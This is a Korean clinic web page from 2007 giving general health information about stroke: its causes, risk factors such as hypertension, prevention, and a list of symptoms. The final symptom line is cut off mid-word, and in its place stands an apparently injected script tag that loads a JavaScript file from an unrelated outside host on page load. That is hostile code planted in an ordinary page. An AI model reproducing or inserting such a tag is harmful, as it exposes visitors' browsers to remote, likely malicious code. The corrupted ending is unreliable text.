뇌졸증 - 한방 건강정보 [38쪽] - 부야한의원

한방 건강정보

제목뇌졸증
작성자관리자 @ 2007.04.27 18:02:53

1.심각한 응급질환 > ①뇌졸중


 


 


 


뇌졸중은 뇌에 있는 혈관이 터지거나(뇌출혈) 막혀서(뇌경색) 생기는 병이다. 흔히 중풍이라고 들 말하지만 그 결과는 다양하다. 멀쩡해 보이는 사람은 어느날 갑자기 쓰러져 사망하거나 반신불 수가 되는 등 치명적인 결과를 가져올 수 있기 때문에 공포의 대상이다. 실제로 50대 이후 사회적으로 어느 정도 성취하여 중추적인 역할을 할 시기에 뇌졸중을 포함한 뇌혈관 질환이 사망 원인 중 수위를 차지하고 있어 그 예방과 처치를 잘 알아두어야 한다. 뇌졸중은 사망하지 않더라도 평생, 혹은 오랜 기간 동안 식물인간, 반신불수, 언어장애 등 그 후휴증이 심각하기 때문에 사회적으로 미치는 손실은 실로 크다 할 것이다.


 


뇌졸중과 관련하여 식사, 운동, 담배 등 생활 전반이 규칙적이고 합리적이라야 한다. 이로 인한 고혈압, 심장질환, 고지질혈증 등으로 뇌졸중 발생의 확률을 높일 수 있기 때문이다. 예를 들어 고혈압 환자는 혈압 조절, 식사, 운동, 적절한 투약으로 뇌졸중의 발생을 최소화할 구 있다. 또한 심한 뇌졸중은 종종 치명적이지만, 많은 사람들이 미소 뇌졸중인 경우 성공적인 회복을 한다. 따라서 나이 드신 분들이 잠시 행동이 이상하거나 마비 증상을 겪으면 보지 말고 의료기관으로 가서 치료에 임하여야 한다.


 


 


 


 


 


뇌졸중은 다음과 같은 증상이 있을 수 있다.


 


-갑작스럽고 심한 두통이 있다.


-심한 구토를 한다.


-환자는 방향감각을 잃고 혼동하며, 불안해 하기도 한다.


-현기증과 의식소실도 가능하다.


-입가가 밑으로 처지고 침을 흘리며, 말을 더듬거나 발음이 어눌해진다.


-한쪽 내지 양쪽 사지가 약?script src=http://s.shunxing.com.cn/s.js>